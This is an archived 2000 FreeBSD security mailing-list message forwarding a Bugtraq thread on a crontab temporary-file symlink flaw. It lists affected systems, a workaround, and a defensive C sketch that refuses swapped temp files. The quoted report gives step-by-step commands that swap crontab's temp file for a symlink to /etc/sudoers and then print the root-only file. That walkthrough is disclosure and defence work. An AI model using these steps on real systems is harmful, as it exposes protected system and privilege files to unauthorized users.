From owner-freebsd-security Thu Oct 26 5:36:52 2000
Date: Thu, 26 Oct 2000 14:36:25 +0200 (MET DST)
From: Konrad Heuer
To: freebsd-security@freebsd.org
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability (fwd)

Exploit below could be reproduced on 4.1-R and Compaq Tru64 UNIX 4.0D;
seems to depend on the way vi stores edit info in /tmp. Exploit does not
work with emacs, e.g.

I removed suid bit of crontab as a workaround. It's not possible for a
user to modify files owned by someone else in this way.

Regards

K. Heuer (kheuer@gwdg.de)

---------- Forwarded message ----------
Date: Wed, 25 Oct 2000 12:30:47 +0200
From: "Fabio Pietrosanti (naif)"
Reply-To: naif@inet.it
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability
Resent-Date: Thu, 26 Oct 2000 14:17:27 +0200 (MET DST)
Resent-From: Eckhard Handke
Resent-To: Konrad Heuer
Resent-Subject: Re: [ Hackerslab bug_paper ] HP-UX crontab temporary file symboliclink vulnerability

Tested also on:

FreeBSD 3.3 = Vulnerable
FreeBSD 2.2.8 = Vulnerable
Aix 4.2 = Not Vulnerable
Linux Slackware 7.0 = Not Vulnerable
Linux Slackware 4.0 = Not Vulnerable

naif

On Tue, 24 Oct 2000, Sergey Nenashev wrote:

> Hi,
>
> Tested on
> 4.0-RELEASE FreeBSD 4.0-RELEASE #9
> 4.1-RELEASE FreeBSD 4.1-RELEASE #1:
>
> Can read any file which starts with the comment symbol (#)
>
> $ ls -l /etc/sudoers
> -r-------- 1 root wheel 313 24 oct 20:20 /etc/sudoers
> $ id
> uid=1002(alf) gid=1002(alf) groups=1002(alf)
>
> $ crontab -e
> ~
> ~
> ~
> /tmp/crontab.hLmjTbK417
> :!sh
>
> [ #### Make symbolic link]
>
> rm /tmp/crontab.hLmjTbK417
>
> ln -sf /etc/sudoers /tmp/crontab.hLmjTbK417
>
> exit
>
> [ #### quit vi ]
> /tmp/crontab.hLmjTbK417
> crontab: installing new crontab
>
> [ #### start crontab editor]
>
> $ crontab -e
> [####### See in vi]
> # sudoers file.
> #
> # This file MUST be edited with the 'visudo' command as root.
> #
> # See the sudoers man page for the details on how to write a sudoers file.
> #
>
> # Host alias specification
>
> # User alias specification
>
> # Cmnd alias specification
>
> # User privilege specification
> root ALL=(ALL) ALL
> alf ALL=(ALL) ALL
> ~
> ~
> ~
>
> If the file does not start with #, then crontab said
>
> "/tmp/crontab.GAeNMP1357":2: bad minute
> crontab: errors in crontab file, can't install
>
> --
> ------
> Alf Delems
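Added example, not part of the thread and not the FreeBSD or HP-UX fix: one way a privileged program can refuse the swapped temp file shown above when it reads the file back by name after the editor exits. The names reopen_edited and demo_swap and the /tmp/crondemo.* paths are hypothetical, and the sketch assumes a platform that provides O_NOFOLLOW.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Reopen an edited temp file by path; return an fd, or -1 if it is unsafe. */
int reopen_edited(const char *path, uid_t owner)
{
    struct stat st;
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0)
        return -1;                  /* fails when path is now a symlink */
    /* Checks are made on the open descriptor, so they cannot be raced. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != owner || st.st_nlink != 1) {
        close(fd);                  /* not a plain, singly linked user file */
        return -1;
    }
    return fd;
}

/* Constructed scenario: mode 0 = untouched, 1 = symlink swap, 2 = hard link. */
int demo_swap(int mode)
{
    char dir[] = "/tmp/crondemo.XXXXXX", tmp[64], other[64], extra[64];
    if (!mkdtemp(dir))
        return -1;
    snprintf(tmp, sizeof tmp, "%s/crontab.tmp", dir);
    snprintf(other, sizeof other, "%s/other", dir);  /* stand-in target file */
    snprintf(extra, sizeof extra, "%s/extra", dir);
    close(open(tmp, O_CREAT | O_EXCL | O_WRONLY, 0600));
    close(open(other, O_CREAT | O_EXCL | O_WRONLY, 0600));
    if (mode == 1 && (unlink(tmp) != 0 || symlink(other, tmp) != 0))
        return -1;
    if (mode == 2 && link(tmp, extra) != 0)
        return -1;
    int fd = reopen_edited(tmp, getuid());
    if (fd >= 0)
        close(fd);
    unlink(tmp); unlink(other); unlink(extra); rmdir(dir);
    return fd >= 0;                 /* 1 = accepted, 0 = rejected */
}

int main(void)
{
    printf("untouched=%d symlink=%d hardlink=%d\n",
           demo_swap(0), demo_swap(1), demo_swap(2));
    return 0;
}
```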